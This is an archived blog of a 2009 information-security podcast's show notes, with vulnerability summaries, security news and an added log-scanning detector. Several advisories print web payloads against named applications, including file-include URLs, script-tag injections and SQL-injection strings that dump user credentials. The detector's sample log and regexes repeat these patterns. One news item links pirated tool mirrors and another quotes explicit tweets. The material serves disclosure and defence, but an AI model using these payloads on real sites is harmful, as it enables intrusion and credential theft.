2009
12.31

No Podcast Today

As we will be partying in the New Year we’ve decided not to do a Podcast today.

2009
12.30

Episode 37 – Year End

InfoSec Daily Podcast


InfoSec Podcast Episode 37 for December 30, 2009. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. For a small or medium-sized business, when your systems are down the resulting downtime can have a devastating impact.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Go to www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10

Go online to register by going to http://www.sans.org/atlanta-cs-events-2010/?utm_source=web-sans&utm_medium=banner&utm_content=Featured_Community_SANS_atlanta-2010-cs_events&utm_campaign=Community_SANS_Atlanta_2010&ref=52093

or call (301) 654-SANS(7267).

Vulnerabilities of Interest:

  1. RoseOnlineCMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input, which could be exploited to obtain potentially sensitive information or to execute local scripts. RoseOnlineCMS 3 B1 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/modules/admincp.php?admin=[LFI%00]
  2. phpAuction is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data; this could lead to execution of script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Example URLs: http://www.example.com/phpauction/register.php?TPL_name=1>”><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&TPL_nick=indoushka&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com and http://www.example.com/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com&TP
  3. The ‘com_adagency’ component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input, which could allow an attacker to potentially obtain sensitive information and execute local scripts in the context of the webserver process. Example URL: http://www.example.com/index.php?option=com_adagency&controller= [-LFI-]
  4. The Memory Book component for Joomla! is subject to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability which could allow an attacker to compromise the application, upload files, execute code, access or modify data, or exploit other vulnerabilities in the underlying database. Memory Book 1.2 is vulnerable; other versions may also be affected. All you need is a browser to exploit this vulnerability.
  5. DrBenHur.com DBHcms is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input, which could allow an attacker to include a file containing malicious PHP code and execute it in the context of the webserver process. This may lead to a compromise of the application and the underlying system; other attacks are also possible. DBHcms 1.1.4 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00
  6. UPDATE: Microsoft IIS was reported to have a security-bypass vulnerability which could cause IIS to interpret unexpected files as CGI applications. For an exploit to succeed, IIS must be configured in a nondefault way and contrary to the vendor’s recommended best practices.
  7. The Q-Personel component for Joomla! is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input, which could be leveraged to execute script code in the browser of an unsuspecting user. Q-Personel 1.0.2(RC2) is vulnerable; other versions may be affected as well. Example URL: http://www.example.com/j15x/index.php?option=com_qpersonel&task=sirala&personel_sira=[XSS CODE]
  8. Stash is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data, which could be leveraged to execute script code in the browser of an unsuspecting user. Stash 1.0.3 is vulnerable; other versions may also be affected. To exploit these issues, an attacker must get the victim to follow a malicious URL.
  9. Calendar Express is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query, which could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Example URL: http://www.example.com/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+usi
News Items of Interest:
According to Adult Protective Services workers, in this tough economy reports of financial scams involving elderly victims have steadily increased. They have some recommendations for those with elderly family members. First, they recommend that you really listen to elderly relatives when they talk about their lives. Are they mentioning new friends, people soliciting money at the front door for charities, or repairmen you’ve never heard of before? Is there talk of a new will? Has your loved one given money to someone recently? Is the phone jangling constantly with calls from telemarketing companies?

Take a good look around the house. Is there food in the refrigerator? Is the cupboard well-stocked with food that hasn’t expired? Do labels indicate that medications have been prescribed by one doctor, or many? Are medications being taken properly?

Seniors who have recently lost a spouse, close friend or child are particularly likely to isolate themselves, often leading to a spiral of depression, and they can be especially vulnerable to crooks.

It’s not enough that your elderly loved one still goes to the supermarket and drives a car: Their executive function, or higher level of reasoning, can deteriorate with age.

If your older relatives use the Internet, make sure they’re not sitting ducks for cyber crime. Have they installed firewalls on their computers? Are their passwords easily hacked? Have they taken a computer security class?

News item 2: http://shmooslugs.pbworks.com/

Robert Fuller has a site for ShmooCon Slugs to help facilitate people getting together for rides to ShmooCon 2010. If you’re not familiar with what slugging is, the site has a reference to Wikipedia, which states: “Slugging, also known as casual carpooling, is the practice of forming ad hoc, informal carpools for purposes of commuting, essentially a variation of ride-share commuting and hitchhiking. While the practice is most common and most publicized in the congested Washington, D.C. area (where it is primarily used by commuters who live in Northern Virginia), slugging is also used in San Francisco, Pittsburgh, and other U.S. cities. Sluggers gather at local businesses and at government-run locations, albeit not always with official sanction.”

News item 3: http://lists.shmoo.com/mailman/listinfo/shmoocon-roommates

There is also a mailing list for attendees of ShmooCon to find roommates. ShmooCon is not responsible for actions based on/around/near or anywhere near related to ShmooCon Roommates. Use at your own risk!

News item 4: http://reflextor.com/trac/a51
http://www.nytimes.com/2009/12/29/technology/29hack.html?_r=1&ref=technology
http://www.theregister.co.uk/2009/12/28/gsm_eavesdropping_breakthrough/
http://news.cnet.com/8301-1009_3-10422340-83.html?part=rss&subj=news&tag=2547-1_3-0-20

Computerworld has an interesting article on how simple it is for hackers to snoop on GSM cellular calls encrypted with the 64-bit cipher called A5/1. At the Chaos Communication Conference in Berlin, researcher Karsten Nohl said that he had compiled 2 terabytes worth of data — cracking tables that can be used as a kind of reverse phone-book to determine the encryption key used to secure a GSM (Global System for Mobile communications) telephone conversation or text message. While Nohl stopped short of releasing a GSM-cracking device — that would be illegal in many countries, including the U.S. — he said he divulged information that has been common knowledge in academic circles and made it “practically useable.”

According to Nohl, using his tables, antennas, specialized software, and $30,000 worth of computing hardware to break the cipher, someone can crack the GSM encryption in real time and listen in on calls. Let’s put this into perspective: there are about 3.5 billion GSM phones worldwide, making up about 80 percent of the mobile market, according to data from the GSM Alliance.

News item 5: http://www.nytimes.com/2009/12/26/opinion/26sat2.html?_r=2&adxnnl=1&adxnnlx=1261810873-sVGmBHkWduJvGowqvAkrFA

The Ohio Supreme Court has struck an important blow for privacy rights, ruling that the police need a warrant to search a cellphone. The court rightly recognized that cellphones today are a lot more than just telephones, that they hold a wealth of personal information and that the privacy interest in them is considerable. This was the first such ruling from a state supreme court. It is a model for other courts to follow.

The Ohio Supreme Court ruled this month, by a 4-to-3 vote, that the search violated the Fourth Amendment’s protection against unreasonable search and seizure. Rather than seeing a cellphone as a simple closed container, the majority noted that modern cellphones — especially ones that permit Internet access — are “capable of storing a wealth of digitized information.”

News item 6: http://www.wired.com/threatlevel/2009/12/montgomery-2
http://www.theregister.co.uk/2009/12/24/cia_montgomery/
A self-proclaimed software programmer who convinced the CIA that he had developed software capable of deciphering hidden messages in Al Jazeera broadcasts appears to have been responsible for an elevation in the national security level in late 2003, causing the grounding of international flights and the evacuation of the Metropolitan Museum of Art. Dennis Montgomery managed to convince a CIA Directorate of Science and Technology employee that his technology and the information it generated were credible. The information was passed to top government officials. Only later did it become evident that Montgomery had not shared his algorithms with anybody in the Government, nor was anyone in the government clear about how the information was obtained. Montgomery also reportedly received a no-bid US $30 million contract for “compression” and “automatic target recognition” technology that he claimed could analyze surveillance video from drones and identify weapons in people’s hands. A man who used to work with Montgomery says he helped fake about 40 demonstrations of the software.

News item 7: http://www.msnbc.msn.com/id/34611083/ns/technology_and_science-tech_and_gadgets/
Two New Jersey state legislators are sponsoring a bill that would impose hefty fines on people and/or organizations that send unsolicited text messages. Of particular concern to Sens. Joseph Vitale and Sean Kean are messages sent to the elderly and disabled and messages that cause people to exceed their monthly text message allotment, incurring additional costs from their providers. An unsolicited ad is defined as one that is sent without prior consent of the recipient that urges the recipient to rent or purchase services or merchandise. First time offenders would be fined up to US $10,000 and repeat offenders fined up to US $20,000. If the violator knew or should have known that the recipient was an elderly or disabled person, the maximum fine increases to US $30,000.

News item 8: http://www.theregister.co.uk/2009/12/24/ddos_attack_ultradns_december_09/
http://www.computerworld.com/s/article/9142681/DDoS_attack_on_DNS_hits_Amazon_and_others_briefly?source=rss_security
http://www.cnn.com/2009/TECH/12/24/cnet.ddos.attack/index.html
http://www.informationweek.com/news/storage/security/showArticle.jhtml?articleID=222100146
A distributed denial-of-service (DDoS) attack against the DNS provider for Amazon, Wal-Mart, the Gap and other shopping websites made those sites temporarily unavailable. The attack, launched against Neustar on December 23, affected users in Northern California. Although the attack kept the sites unavailable for only about an hour, last-minute holiday shoppers experienced frustrating delays. An UltraDNS spokesperson said that “queries may have taken some time to resolve and some may not have been completed, but there never was an outage.”

News item 9: http://www.washingtonpost.com/wp-dyn/content/article/2009/12/23/AR2009122302970_pf.html
A report from the Government Accountability Office (GAO) faults five government agencies, two congressional offices and the National Security Council for the leak of information about hundreds of US civilian nuclear facilities. The document was published on the Government Printing Office website in June and remained visible for about one day. The document was intended for the International Atomic Energy Agency (IAEA). Some of the confusion stemmed from the document’s classification with an IAEA term that is not recognized in the US. NSC did not provide specific instructions for handling the document once delivered to the White House clerk’s office.

News item 10: http://abcnews.go.com/Business/wireStory?id=9418695
A US federal judge has granted preliminary approval to a proposed settlement that would have Countrywide Financial Corp. provide free credit monitoring to as many as 17 million people whose personal information was compromised. The settlement also provides up to US $50,000 in reimbursement for each instance of identity fraud that can be traced to the breach and for which the victims were not reimbursed otherwise and in which they lost something of value. The suit has its origins in data theft committed by former Countrywide analyst Rene Rebollo Jr., who downloaded thousands of customers’ information every week for two years and sold it to Wahid Siddiqi. Siddiqi pleaded guilty to fraud earlier this month; Rebollo’s trial is scheduled to begin in January.

News item 11: http://www.theregister.co.uk/2009/12/24/inmate_prison_hack/
http://www.computerworld.com/s/article/9142628/Inmate_gets_18_months_for_hacking_prison_computer
Francis G. Janosko has been sentenced to 18 months in prison for breaking into the Plymouth (Massachusetts) County Correctional Facility’s computer network, accessing information about more than 1,100 prison employees and making that information available to other inmates. Janosko pleaded guilty to damaging a protected computer in September. Janosko, who was an inmate at the time on unrelated charges, was using a machine that was supposed to be configured to allow access only to a legal research program, but he managed to exploit a vulnerability that allowed him access to the Internet and to the prison network.

News item 12: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=222003024&subSection=Attacks/breaches
http://www.scmagazineus.com/citibank-refutes-reported-hack-by-russian-gang/article/160124/
http://news.cnet.com/8301-1009_3-10420308-83.html
http://www.cbsnews.com/stories/2009/12/23/eveningnews/main6016135.shtml
http://online.wsj.com/article/SB126145280820801177.html?mod=rss_Today%27s_Most_Popular
While the FBI says it is investigating losses totaling tens of millions of dollars from Citibank accounts, Citibank parent company Citigroup denies reports that it has fallen prey to a cyber attack or that an investigation is underway. Citigroup did acknowledge that its systems have been probed but persisted in denying that an attack occurred and that money was stolen from customer accounts. The cyber thieves allegedly used the Black Energy botnet in their attacks. Sources have suggested that the Russian Business Network, a notorious cybercrime network, is behind the cyber heists. There is a report of one man being blocked from accessing his company’s Citibank account; although he alerted the bank immediately, a day later more than US $1 million had been withdrawn without his authorization. About 80 percent of the funds were recovered, and Citibank covered the man’s losses for the rest.

News item 13: http://www.scmagazineuk.com/mbna-confirms-data-loss-after-laptop-containing-personal-details-of-thousands-of-customers-was-stolen-from-vendor/article/160217/
http://www.net-security.org/secworld.php?id=8656
http://www.lep.co.uk/news/Customer-credit-card-details-stolen.5929370.jp
MBNA is notifying thousands of customers that a laptop stolen from NCO Europe offices contains their credit card information. NCO Europe is a third-party contractor. Although the files do contain personal information, no PINs are believed to be included. While no fraudulent activity has been detected on the compromised accounts, MBNA is offering affected customers one year of credit monitoring service and is monitoring all compromised accounts.

2009
12.29

Episode 36

InfoSec Daily Podcast


InfoSec Podcast Episode 36 for December 29, 2009. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. For a small or medium-sized business, when your systems are down the resulting downtime can have a devastating impact.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Go to www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10

Go online to register by going to http://www.sans.org or call (301) 654-SANS(7267).

Vulnerabilities of Interest:

  1. APC Switched Rack Power Distribution Units (PDU) are subject to a cross-site scripting vulnerability because the device’s web interface fails to properly sanitize user-supplied input. This may be leveraged to execute script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. APC Switched Rack PDU AP7932 is vulnerable; other versions may also be affected. Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI. Example URL is available: http://www.example.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
  2. The Kleinanzeigenmarkt plugin for Woltlab Burning Board is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could result in a compromise of the application, accessing or modifying data, or exploiting the underlying database. All it takes is a browser to exploit this issue. Exploit code is available in the wild.
  3. Pragyan CMS is subject to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This could result in compromising the application as well as potentially the complete system. Pragyan CMS 2.6.4 is vulnerable; other versions may also be affected. Exploiting these issues is as simple as using a browser and the example URLs: http://www.example.com/cms/modules/search/search.php?moduleFolder=[Evil] and http://www.example.com/cms/modules/search/search.php?sourceFolder=[Evil].
  4. Jax Guestbook is subject to an authentication-bypass vulnerability which could allow an attacker to gain administrative access to the affected script and/or make configuration changes. This could potentially lead to further attacks. Jax Guestbook 3.50 is vulnerable; other versions may also be affected. Exploiting this issue is as simple as using a browser and the example URL: http://www.example.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0
  5. MyBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input, which may be leveraged to execute script code in the browser of a user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and to launch additional attacks. MyBB 1.4.10 is vulnerable; other versions may be affected as well. Exploiting this issue requires enticing a user to follow a malicious URL. Example URLs are available: http://www.example.com/myps.php?action=donate&username=”/> and http://www.example.com/myps.php?action=donate&username=<IMG”"”>”> .
  6. The Automated Logout module for Drupal is subject to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. This may be leveraged to execute script code in the browser of a user in the context of the affected site. Automated Logout 6.x-1.6, 6.x-2.2 and prior versions are vulnerable.
  7. Wireshark is subject to multiple denial-of-service vulnerabilities and a buffer-overflow vulnerability which may allow an attacker to crash the application and deny service to legitimate users. Additionally, there is the possibility that these vulnerabilities could result in the execution of code in the context of users running the application. These issues affect Wireshark 0.9.0 through 1.2.4. Proof-of-concept capture files for the denial-of-service issues are available from the following locations: https://bugs.wireshark.org/bugzilla/attachment.cgi?id=4055 and http://www.wireshark.org/download/automated/captures/fuzz-2009-12-07-11141.pcap.
  8. The ‘com_schools’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, and access or modify data in the underlying database. Example URL code is available: http://www.example.com/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users–
  9. Microsoft IIS is prone to a security-bypass vulnerability that may result in IIS interpreting unexpected files as CGI applications. Attackers may be able to exploit this vulnerability to bypass intended security restrictions. Reports indicate that IIS 7.5 is not vulnerable to this issue; furthermore, it is currently unknown if IIS 7.0 is vulnerable.
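
Most of the web-application advisories in this episode and in Episode 37 share a handful of request patterns: a %00 terminator on an included path, a remote URL passed to an include parameter, a UNION SELECT in a numeric parameter, and a script tag reflected from a form field. The following is an added example, not code from the podcast or from any of the affected projects, of how a defender can spot those patterns in web-server access logs; the log lines and the 203.0.113.9 host are constructed for illustration.

```python
"""Detect the LFI/RFI, SQL-injection and XSS request patterns described in the
advisories above, run over constructed Common Log Format access-log lines."""
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample traffic; none of these lines or hosts are real.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Dec/2009:10:01:02 -0500] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120
10.0.0.7 - - [30/Dec/2009:10:01:09 -0500] "GET /modules/admincp.php?admin=../../../../etc/passwd%00 HTTP/1.1" 200 2310
10.0.0.9 - - [30/Dec/2009:10:02:15 -0500] "GET /index.php?dbhcms_core_dir=http://203.0.113.9/shell.txt%00 HTTP/1.1" 200 180
10.0.0.11 - - [30/Dec/2009:10:03:40 -0500] "GET /calendarexpress2.1/year.php?catid=-4+union+select+0,concat(USER(),0x3a,VERSION()) HTTP/1.1" 200 4100
10.0.0.13 - - [30/Dec/2009:10:04:01 -0500] "GET /phpauction/register.php?TPL_nick=1%3E%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 900
10.0.0.15 - - [30/Dec/2009:10:05:11 -0500] "GET /index.php?option=com_adagency&controller=../../../../proc/self/environ HTTP/1.1" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule is tested against a fully decoded query-parameter value.
RULES = [
    ("lfi-null-byte",  re.compile(r"\x00")),                      # %00 path terminator
    ("path-traversal", re.compile(r"\.\./|\.\.\\")),              # ../ or ..\ sequences
    ("rfi-remote-url", re.compile(r"^(https?|ftp)://", re.I)),    # remote include target
    ("sqli-union",     re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b", re.I)),
    ("xss-script-tag", re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.I)),
]


def decode(value: str) -> str:
    """URL-decode twice so a double-encoded %2500 still surfaces as a NUL byte."""
    return unquote_plus(unquote_plus(value))


def inspect_target(target: str):
    """Return [(rule, param, decoded_value)] for each suspicious query parameter."""
    findings = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        value = decode(raw)
        for rule, pattern in RULES:
            if pattern.search(value):
                findings.append((rule, decode(name), value))
    return findings


def scan_log(text: str):
    """Return [(ip, target, rule, param, value)] for every hit in the log text."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; a real pipeline would count unparsable lines too
        for rule, param, value in inspect_target(m.group("target")):
            alerts.append((m.group("ip"), m.group("target"), rule, param, value))
    return alerts


def count_by_rule(alerts):
    """Summarise alerts as {rule: hit count}."""
    return dict(Counter(a[2] for a in alerts))


if __name__ == "__main__":
    for ip, target, rule, param, value in scan_log(SAMPLE_LOG):
        print(f"{ip:<10} {rule:<15} {param}={value!r}")
    print(count_by_rule(scan_log(SAMPLE_LOG)))
```

The decoded values are what the vulnerable scripts would actually see, so matching after decoding catches the %3CScRiPt%3E form as readily as a literal tag.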
News Items of Interest:
News item 1: http://www.businesswire.com/portal/site/home/permalink/?ndmViewId=news_view&newsId=20091226005004&newsLang=en
Amazon.com on Saturday released its annual post-Christmas statement on holiday sales and made one thing clear: the Kindle was king.

Amazon.com 2009 Holiday Facts (www.amazon.com only):

  • Amazon customers purchased enough fruit cake to equal the weight of a 1967 Volkswagen Bug.
  • Amazon customers bought enough gingerbread house kits that if stacked on top of each other would be as tall as the Sears Tower.
  • If all the computers customers purchased this holiday were stacked one on top of the other, they would be more than twice as high as Mt. Everest.
  • Amazon customers bought over 50 times more Light Therapy devices this holiday season than there are sunny days in Seattle the entire year.
  • For the holiday time period alone, Amazon customers purchased enough shoot-and-share camcorders to supply 50 years’ worth of non-stop YouTube watching.
  • Amazon customers bought enough Levi’s jeans to clothe everyone at the opening ceremony of the 2010 Olympics in Vancouver.
  • Amazon customers purchased so many Blu-ray disc players that if you lined them up side to side, they would stretch for more than 27 miles.
  • During the 2009 holiday season, Amazon customers bought enough 8 GB iPod touches to play 442 years of continuous music.
  • In 2009, Amazon customers purchased enough heart rate monitor watches to put one on the wrist of everyone who finished the New York City marathons in 2008 and 2009.
  • Amazon customers purchased enough Frustration-Free Package items to eliminate over 32,000 pounds of frustrating plastic materials, such as plastic clamshells.
  • The last One-Day Prime order that was delivered in time for Christmas, was placed on Dec. 23 at 9:17 p.m. Pacific and shipped to Boca Raton, Florida for delivery on Dec. 24. The item was a pair of Yellow Gold 8-8.5mm Freshwater Cultured Pearl Stud Earrings.
  • The last Local Express Delivery order that was delivered in time for Christmas, was placed by a Prime member and went to Seattle. It was a Kindle that was ordered at 1:43 p.m. on Christmas Eve and delivered at 4:57 p.m. that evening.

Amazon.com’s Hot Holiday Bestsellers (Nov. 15 through Dec. 19, based on units ordered):

  • Electronics: Kindle Wireless Reading Device; Apple iPod touch 8 GB; and Garmin nuvi 260W 4.3-inch GPS
  • Toys: Scrabble Slam Cards; The Settlers of Catan; and Scene It? Twilight Deluxe Edition
  • Video Games and Hardware: Wii Fit Plus with Balance Board; New Super Mario Bros; and Call of Duty: Modern Warfare 2

News item 2: http://seclists.org/fulldisclosure/2009/Dec/438
As discussed last week, it appears that DECAF was disabled by the authors at decafme.org. Well, it looks like some people over at soldierx.com have patched the binary to re-enable it and remove the phone home functionality. The files are at http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or http://www.multiupload.com/88TEOEYCSZ. Of the sites listed on the multiupload.com site, I had problems with both RapidShare and MegaUpload. The other sites seemed to work well.

News item 3: http://ontheflix.com/2009/12/25/celtics-ray-allen-twitter-account-gets-hacked-sends-naughty-tweets/
It seems that Celtics shooting guard Ray Allen’s Twitter account was hacked and apparently was sending some pretty naughty tweets. The Huffington Post is reporting tweets such as: “I’m getting there. When you masturbate think about my tongue or your cl*t and switching back and forth from my d**k to my tongue.”

The tweets got deleted later on, and 14 minutes later another tweet showed up stating an apology and claiming he was not responsible. It read like this: “I’m sorry my acct was hacked into. I need to changey tweet handle.” Then he changed his Twitter name from @sugarray20 to @greenrayn20. Ray Allen said he may have to get off “Twitter” if this continues to happen. He tweeted, “i hope that it was amusing to people but im either gonna change my password or stop tweeting altogether.”

News item 4: http://www.wired.com/dangerroom/2009/12/not-just-drones-militants-can-snoop-on-most-us-warplanes/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+wired%2Fpolitics+%28Wired%3A+Politics%29
Wired Magazine is reporting that militants tapping into drones’ video feeds was just the start. Apparently, the U.S. military’s system for bringing overhead surveillance down to soldiers and Marines on the ground is also vulnerable to electronic interception. That means militants have the ability to see the video feeds from traditional fighters and bombers as well as unmanned spy planes. The problem is in the process of being addressed. But for now, an enormous security breach is even larger than previously thought.

So what is to blame? Apparently, the feeling is that early on units were “fielded so fast that it was done with an unencrypted signal. It could be both intercepted (e.g. hacked into) and jammed”. The question is why it is taking 10 years to fix the issue. You’ve got satellite providers in the L, C, S, Ku [satellite] bands that are sending data encrypted, so it’s not like this is new technology. What’s the big deal? Well, imagine trying to ensure that all units in a theater have the correct encryption/decryption keys necessary to receive the data they need. This is really where the issue is. Do you trust the small units with these keys? How do you handle key rotation?

News item 5: http://blog.tenablesecurity.com/2009/12/top-10-nessus-plugins-for-2009.html

In 2009, Tenable released over 8,100 new plugins (and the year isn’t over yet!). These plugins have covered several different types of vulnerabilities, including web applications, embedded systems, local checks for operating systems and much more. Tenable polled its employees to find some of their favorite plugins released this year, and compiled the following list:

  1. DD-WRT HTTP Daemon Metacharacter Injection Remote Code Execution – This vulnerability allows remote attackers to inject commands via a flaw in the HTTP management web application on embedded systems running DD-WRT.
  2. Windows Remote Registry Enable/Disable – For remote authenticated checks to run on Windows systems, the remote registry service needs to be enabled. While this may not be a service you wish to run on all your systems, this plugin solves that problem by temporarily enabling and then disabling the remote registry service when the scan has completed.
  3. PCI Test Requirements – Back in April of 2009, I wrote a blog post titled “PCI DSS Auditing Linux, Apache, PHP & MySQL with Nessus 4”.
  4. USB Drives Enumeration – In 2009, over 218 million records fell into the wrong hands due to some form of breach (According to a report generated by DataLossDB). Some of those data loss incidents can be attributed to removable media such as USB thumb drives.
  5. Malware Infected Host – This Nessus plugin will seek out and report on these types of HTTP servers.
  6. Dell Remote Access Controller Default Password (calvin) for ‘root’ Account
  7. Conficker Detection (uncredentialed check) – Conficker was one of the major malware releases in 2009. This Nessus plugin could detect it on remote systems without using credentials.
  8. Backported Security Patches (HTTP) – This plugin looks at Linux distribution banners for common FTP, HTTP and SSH services that seem as if they have not been patched, but are in fact most likely to have been fixed.
  9. Microsoft Windows SMB Shares Access – The plugin that keeps on giving! A simple plugin, but one of the most likely to fire during an internal audit where Windows machines are found. The shared drives could contain nothing or they could contain the entire HR database.
  10. Enhanced Web Application Testing Plugins – Not a plugin per se, but a bunch of enhanced web app tests with new options that didn’t exist before ’09.

News item 6: http://www.wafb.com/Global/story.asp?S=11661499

A story about a 21-year-old being caught on camera is probably nothing new. Stealing decoy cameras is probably a little odd. A landowner having set up decoy cameras to capture the theft of his digital game surveillance cameras is even more odd. Believe it or not, Dustin Archibald of Denham Springs was caught on camera stealing a camera, with a “No Trespassing” sign visible in the background.

Archibald claims that he was not stealing the camera, but rather taking it so the landowner would not be able to hunt deer in the area. Unfortunately for him, with the property owner’s photographic evidence from his surveillance cameras, Archibald was identified right away and consequently turned himself in to authorities.

The take-away here is that you never know what is watching a device that watches.

2009
12.28

InfoSec Daily Podcast

Tonight we are joined by a very special guest, Dave Shackleford. Dave is the Director, Risk & Compliance and Interim Director, Security Assessments at Sword & Shield Enterprise Security, Inc. (http://www.sses.net). Additionally, Dave is the SANS Institute GIAC technical director. Dave is the co-author of Hands-On Information Security from Course Technology as well as the “Managing Incident Response” chapter in the Course Technology book Readings and Cases in the Management of Information Security. Recently, Dave co-authored the first published course on virtualization security for the SANS Institute. Dave currently serves on the board of directors at the Technology Association of Georgia’s Information Security Society and the SANS Technology Institute. He is also the author of the Shackfoo article titled “One for the n00bs”.

2009
12.25

Merry Christmas

Merry Christmas from our family to yours.

2009
12.24

No Podcast

Merry Christmas to all.  We will be taking a few days off to enjoy the Christmas Holiday.  We will be back on the 28th with Episode 35.

2009
12.23

ISD Episode 34 – Going Solo

InfoSec Daily Podcast

InfoSec Podcast Episode 34 for December 23, 2009. Due to the rest of the crew having prior commitments, I’ll be going solo tonight. If nothing else, at least the podcast should finish on time. We do need to announce that we will not be recording for the remainder of the week, though we will be back on Monday, December 28th. Sort of apropos, huh.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. For small and medium-sized businesses, when your systems are down the resulting downtime can have a devastating impact.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Go to www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.  There are 5 classes currently being offered.  Leading off with Scott Moulton’s SEC606.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Register by emailing sales@sans.org or by calling (301) 654-SANS(7267).


Vulnerabilities of Interest:

  1. IBM Tivoli Storage Manager is prone to multiple vulnerabilities: multiple buffer-overflow issues and multiple unauthorized-access issues. Exploiting these issues could cause a denial-of-service condition or code execution, as well as allow an attacker to read, copy, edit, or delete files on a victim’s computer. Core Security has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. A Metasploit exploit module is available.
